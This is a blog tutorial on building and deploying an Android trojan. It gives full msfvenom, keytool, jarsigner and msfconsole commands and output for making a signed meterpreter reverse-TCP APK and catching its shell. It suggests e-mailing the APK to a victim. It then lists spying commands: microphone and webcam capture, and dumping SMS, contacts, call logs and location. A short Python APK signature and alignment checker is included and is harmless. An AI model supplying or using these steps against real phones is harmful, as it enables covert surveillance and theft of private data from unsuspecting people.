In my earlier post we learned how to hack Windows using Kali Linux. This time we are going to hack Android with Kali Linux. We make use of the msfvenom tool in Kali Linux, which combines the functionality of Msfpayload and Msfencode.
NOTE: This tutorial is for educational purposes only.
Prerequisites for hacking Android
- Kali Linux
- Android phone: for the demonstration we used the Android emulator provided by Google.
Steps to hack Android
1. Create the payload
To create the Trojan for the Android hack we need to generate a payload with the msfvenom utility in Kali Linux.
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.202.128 LPORT=4444 R > /root/Desktop/my0704.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes
The LHOST IP in the above command is the Kali Linux IP as shown by the ifconfig command.
The above command creates the Trojan APK file, which can be installed on the target phone to exploit it; however, before that we need to sign the APK so it installs properly. Follow the steps below.
a. Create a keystore:
root@kali:~# keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000
The above command asks a list of questions and for a password.
b. Sign the created APK file using jarsigner.
root@kali:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore /root/Desktop/my0704.apk app
Enter Passphrase for keystore:
   adding: META-INF/APP.SF
   adding: META-INF/APP.RSA
  signing: classes.dex
  signing: AndroidManifest.xml
  signing: resources.arsc
jar signed.

Warning:
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-08-21) or after any future revocation date.
c. Verify the APK using jarsigner.
root@kali:~# jarsigner -verify -verbose -certs /root/Desktop/my0704.apk
d. Optimize the APK file using zipalign.
Before proceeding, install zipalign with the command below:
apt-get install zipalign
Now let's optimize the APK.
root@kali:~# zipalign -v 4 /root/Desktop/my0704.apk /root/Desktop/my0704_sign.apk
Verifying alignment of /root/Desktop/my0704_sign.apk (4)...
      50 META-INF/MANIFEST.MF (OK - compressed)
     281 META-INF/APP.SF (OK - compressed)
     623 META-INF/APP.RSA (OK - compressed)
    1752 META-INF/ (OK)
    1802 META-INF/SIGNFILE.SF (OK - compressed)
    2087 META-INF/SIGNFILE.RSA (OK - compressed)
    2750 classes.dex (OK - compressed)
    8726 AndroidManifest.xml (OK - compressed)
   10443 resources.arsc (OK - compressed)
Verification successful
So the final APK we use to hack Android is named “my0704_sign.apk”.
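As an added example (not part of the original post), the following Python script reproduces what steps c and d check: it reports whether the APK carries v1 (JAR) signature files in META-INF and computes each entry's data offset to verify 4-byte alignment the way zipalign -v does. It runs on a constructed sample zip built in build_sample_apk(), not on the real my0704_sign.apk.

```python
import io
import struct
import zipfile

LOCAL_HEADER = "<4sHHHHHIIIHH"  # zip local file header: 30 fixed bytes, then name and extra
LOCAL_HEADER_LEN = struct.calcsize(LOCAL_HEADER)


def in_meta_inf(name, suffix):
    return name.startswith("META-INF/") and name.endswith(suffix)


def check_apk(apk_bytes, alignment=4):
    """Report v1 (JAR) signature files and per-entry alignment of an APK:
    stored entries must start at a multiple of `alignment`, as zipalign -v checks."""
    buf = io.BytesIO(apk_bytes)
    entries = []
    with zipfile.ZipFile(buf) as zf:
        for zi in zf.infolist():
            # local header name/extra lengths may differ from the central directory
            buf.seek(zi.header_offset)
            fields = struct.unpack(LOCAL_HEADER, buf.read(LOCAL_HEADER_LEN))
            if fields[0] != b"PK\x03\x04":
                raise ValueError("bad local header for " + zi.filename)
            data_offset = zi.header_offset + LOCAL_HEADER_LEN + fields[9] + fields[10]
            if zi.compress_type != zipfile.ZIP_STORED:
                status = "OK - compressed"
            elif data_offset % alignment == 0:
                status = "OK"
            else:
                status = "BAD - %d" % (data_offset % alignment)
            entries.append((data_offset, zi.filename, status))
    names = [name for _, name, _ in entries]
    return {
        # v1 signing adds a .SF digest file plus a .RSA/.DSA/.EC signature block
        "signed_v1": any(in_meta_inf(n, ".SF") for n in names)
        and any(in_meta_inf(n, (".RSA", ".DSA", ".EC")) for n in names),
        "aligned": all(not s.startswith("BAD") for _, _, s in entries),
        "entries": entries,
    }


def build_sample_apk():
    """Constructed sample: an unsigned mini 'apk' with one misaligned and one
    aligned stored entry (not a real application)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n", zipfile.ZIP_STORED)
        zf.writestr("resources.arsc", b"\x02\x00\x0c\x00" * 4, zipfile.ZIP_STORED)
    return buf.getvalue()
```

On the sample, the manifest lands at offset 50 (misaligned by 2) while resources.arsc lands at 116 (aligned), so the report comes back unsigned and not aligned; point check_apk at a real APK's bytes to get the same per-entry listing as the zipalign output above.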
2. Start msfconsole on Kali Linux to exploit the Android phone.
root@kali:~# msfconsole
       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >
At the msf prompt, load the multi/handler exploit and set the Android payload using the commands below:
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) >
In the commands below we set LHOST to the Kali Linux IP, which can be taken from the ifconfig command on Kali Linux, and LPORT to 4444, the port used by the exploit.
msf exploit(handler) > set LHOST 192.168.202.128
LHOST => 192.168.202.128
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) >
Finally, give the exploit command, which waits until the APK is executed on the Android phone.
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.202.128:4444
[*] Starting the payload handler...
3. Execute the APK on Android.
Here we are using the Android emulator provided by Google, so you need to download the ISO image from the project's website.
Once downloaded, create a normal virtual machine in VMware, mount the ISO on the VM and start it. Set up the Android VM using your Gmail ID.
In a real scenario you would e-mail the victim to download and install the app. In our case we upload the APK to the VM and install it.
Once installed, open the app “Main Activity”.
Upon opening the app we get a meterpreter session on our Kali Linux, as below:
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.202.128:4444
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.202.129
[*] Meterpreter session 1 opened (192.168.202.128:4444 -> 192.168.202.129:48620) at 2017-04-05 21:37:50 +0000

meterpreter >
Type the sysinfo command at the meterpreter prompt to get details about the phone.
meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.3 - Linux 3.10.2-android-x86+ (i686)
Meterpreter : java/android
meterpreter >
You can use the list of commands below on the Android session. The descriptions are self-explanatory; you can also use the help command at the meterpreter prompt for details.
Stdapi: Webcam Commands
=======================

    Command          Description
    -------          -----------
    record_mic       Record audio from the default microphone for X seconds
    webcam_chat      Start a video chat
    webcam_list      List webcams
    webcam_snap      Take a snapshot from the specified webcam
    webcam_stream    Play a video stream from the specified webcam

Android Commands
================

    Command             Description
    -------             -----------
    activity_start      Start an Android activity from a Uri string
    check_root          Check if device is rooted
    dump_calllog        Get call log
    dump_contacts       Get contacts list
    dump_sms            Get sms messages
    geolocate           Get current lat-long using geolocation
    interval_collect    Manage interval collection capabilities
    send_sms            Sends SMS from target session
    set_audio_mode      Set Ringer Mode
    sqlite_query        Query a SQLite database from storage
    wlan_geolocate      Get current lat-long using WLAN information
Comments (2)
The session just ends after less than 10 seconds. How can I solve this issue?
How to install jarsigner in Kali Linux lite?